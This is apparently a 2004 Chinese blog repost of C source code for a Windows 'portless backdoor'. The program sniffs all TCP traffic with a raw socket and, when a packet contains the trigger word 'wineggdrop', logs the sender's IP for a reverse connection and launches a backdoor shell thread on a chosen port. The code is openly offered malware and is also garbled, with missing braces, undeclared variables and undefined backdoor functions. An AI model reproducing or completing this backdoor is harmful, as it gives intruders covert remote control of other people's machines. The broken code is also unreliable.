

Posted on 2004-11-27 18:25  charcs  阅读(690)  评论(0编辑  收藏  举报

// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: To Demonstrate Some Portless Backdoor Technique
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)

#include <windows.h>
#include <stdio.h>
#include <winsock2.h>

// Some Structures To Define
#define  IP_HDRINCL        2
#define SIO_RCVALL         _WSAIOW(IOC_VENDOR,1)
#define MAX_PACK_LEN    65535
#define MAX_ADDR_LEN     16
#define MAX_HOSTNAME_LAN    255

typedef struct _iphdr
   unsigned char  h_lenver;
   unsigned char  tos;
   unsigned short total_len;
   unsigned short ident;
   unsigned short frag_and_flags;
   unsigned char  ttl;
   unsigned char  proto;
   unsigned short checksum;
   unsigned int   sourceIP;
   unsigned int   destIP;

typedef struct _tcphdr
   USHORT th_sport;
   USHORT th_dport;
   unsigned int  th_seq;
   unsigned int  th_ack;
   unsigned char th_lenres;
   unsigned char th_flag;
   USHORT th_win;
   USHORT th_sum;
   USHORT th_urp;
// End Of Structure

// Global Variable
char SourceIPAddress[MAX_ADDR_LEN];    // Hold The Source IP(This Can Be Used To Do Reverse Connection)
int  BackDoorPort = 0;     // The Port Back Door Will Bind

// Function ProtoType Declaration
BOOL   InitSocket();
BOOL   DoSniffing();
BOOL   DecodeIPPack(const char *Buffer,const int BufferSize);
BOOL   DecodeTCPPack(const char * TCPBuffer,const int BufferSize);
BOOL   IsWin2KOrAbove();
BOOL   GetABackDoorShell(const SOCKET ListenSocket);
BOOL     SendSocket(const SOCKET ClientSocket,const char *Message);
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);
// End Of Fucntion ProtoType Declaration

// Main Function
int main(int argc,char *argv[])
 if (!IsWin2KOrAbove())    // This System Running This Program Is Not Win 2K Or Above
    printf("The Program Must Run Under Win 2k Or Above OS\n");    // Display This Message
    return -1;    // Quit The Program

 if (argc == 2)      // We Get Argument
    BackDoorPort = atoi(argv[1]);      // Argument One Is The Back Door's Port
 else    // No Argument
    BackDoorPort = 1982;      // Back Door's Port Will Be Defined On 1982

 if (!InitSocket())     // Fail To Initize Socket
    printf("Fail To Start Up Winsock\n");    // Display Error Message
    return -1;    // Quit The Program
 DoSniffing();    // Do Sniffing
 return 0;     // Quit The Program
}// End Of Main Function

// Purpose: To Initize Socket
// Return Type: Boolean
// Parameters:  NULL
// This Is Too Simple,I Won't Comment It
BOOL InitSocket()
 WSADATA data;
 WORD ver;

 ver = MAKEWORD(2,2);
 if (WSAStartup( ver, &data )!= 0 )
     return FALSE;
 return TRUE;
}// End Of InitSocket Function

// Purpose: To Do None-Driver Sniffing
// Return Type: Boolean
// Parameters:  NULL
BOOL DoSniffing()
 int Length=0;    // Variable To Hold The Receive Buffer Length
 char RecvBuf[MAX_PACK_LEN] = {0};     // Receive Buffer
 SOCKET SocketRaw = INVALID_SOCKET;    // Raw Socket

 SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);    // Create A Raw Socket
 if (SocketRaw == INVALID_SOCKET)      // Fail To Create A Raw Socket
    printf("Fail To Create A Raw Socket\n");    // Display Error Message
    return FALSE;    // Return False


 if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR)      // Fail To Get The Host Name
    printf("Fail To Get Host Name\n");    // Display Error Message
    closesocket(SocketRaw);      // Close The Raw Socket Created
    return FALSE;    // Return False

 // The Below Is The NIC Stuff
 struct hostent FAR * pHostent;
 pHostent = (struct hostent * )malloc(sizeof(struct hostent));    // Allocate Hostent Buffer
 pHostent = gethostbyname(name);
 sa.sin_family = AF_INET;     // That's Internet Related
 sa.sin_port = htons(0);      // Any Port Avariable On The OS
 if (pHostent->h_addr_list[0] != 0)    // We Only Check The First NIC
    memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);    // We Use The First NIC As The Sniffing Subject
 else    // Well,The First NIC Is Not Valid
    printf("Get Host By Name Fails\n");      // Display Error Message
    free(pHostent);     // Free The Hostent Buffer
    return FALSE;    // Return FALSE;
 free(pHostent);     // Free The Hostent Buffer

 if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR)    // Bind The Raw Socket On The First NIC,But Fails
    printf("Fail To Bind\n");    // Display Error Message
    closesocket(SocketRaw);      // Close The Raw Socket
    return FALSE;    // Return False

 // Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes)
 DWORD dwBufferLen[10] ;
 DWORD dwBufferInLen = 1 ;
 DWORD dwBytesReturned = 0 ;

 if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR)
    return FALSE;

 while(TRUE)      // Sniffing Starts Here With Forever Loop
    memset(RecvBuf, 0, sizeof(RecvBuf));     // Reset The Receive Buffer
     Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0);    // Try To Receive Data
    if (Length == SOCKET_ERROR)     // Get Error As Receiving Data
       printf("Fail To Receive Data\n");     // Display Error Message
       break;     // Leave The Loop
    if (DecodeIPPack(RecvBuf,Length))     // Decode The Buffer Received,And The Active Code Is Found
       printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort);      //We Are Going To Activate The BackDoor
       DWORD dwThreadID;
       HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID);    // Create The Back Door Thread
       WaitForSingleObject(BackDoorThread,INFINITE);     // Wait Until The Back Door Ends

 closesocket(SocketRaw);      // Close The Raw Socket
 return TRUE;     // Return
}// End Of DoSniffing Function

// Purpose: To Decode The IP Packer
// Return Type: Boolean
// Parameters:  1.const char *Buffer   -->The Received Buffer
//              2.Const int BufferSize -->The Received Buffer Size
BOOL DecodeIPPack(const char *Buffer,const int BufferSize)
 IP_HEADER *pIpheader;     // IP Header
 SOCKADDR_IN saSource, saDest;
 pIpheader = (IP_HEADER *)Buffer;      // Transfer The Buffer Into IP Header Form
 int Protocol = pIpheader->proto;      // Get The Protocol
 if ((Protocol != IPPROTO_TCP))     // Not TCP Protocol
    return FALSE;    // Return False Since We Only Interest In TCP Protocol

 saSource.sin_addr.s_addr = pIpheader->sourceIP;
 strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN);     // Get The Source IP(Important For Doing Reverse Connection)

 int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf);    // Get The IP Length
 return DecodeTCPPack(Buffer+IPLength, BufferSize);      // Decode TCP Packer
}// End Of DecodeIPPack Function

// Purpose: To Decode The TCP Packer
// Return Type: Boolean
// Parameters:  1.const char *TCPBuffer  -->The TCP Buffer
//              2.Const int BufferSize   -->The TCP Buffer Size
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize)
 TCP_HEADER * pTcpHeader;     // TCP Header
 int iSourcePort,iDestPort;      // Source Port And DestPort

 pTcpHeader = (TCP_HEADER * )TCPBuffer;      // Transfer The Buffer Into TCP Header Form
 int TcpHeaderLen =  pTcpHeader->th_lenres>>4;     // Get The TCP Leader Length
 TcpHeaderLen *= sizeof(unsigned long);
 char * TcpData=TCPBuffer+TcpHeaderLen;      // Get The TCP Data

 iSourcePort = ntohs(pTcpHeader->th_sport);     // Get The Source Port
 iDestPort = ntohs(pTcpHeader->th_dport);    // Get The Destination Port
 if (strstr(TcpData,"wineggdrop")!=NULL)     // If The TCP Data Contains A Word "wineggdrop"(The Active Code),Then Bingo
    printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort);     // Display A Message
    return TRUE;     // Return TRUE(The Back Door Will Be Activated Soon)
 return FALSE;    // We Didn't Receive An Active Code,Return False
}// End Of DecodeTCPPack Function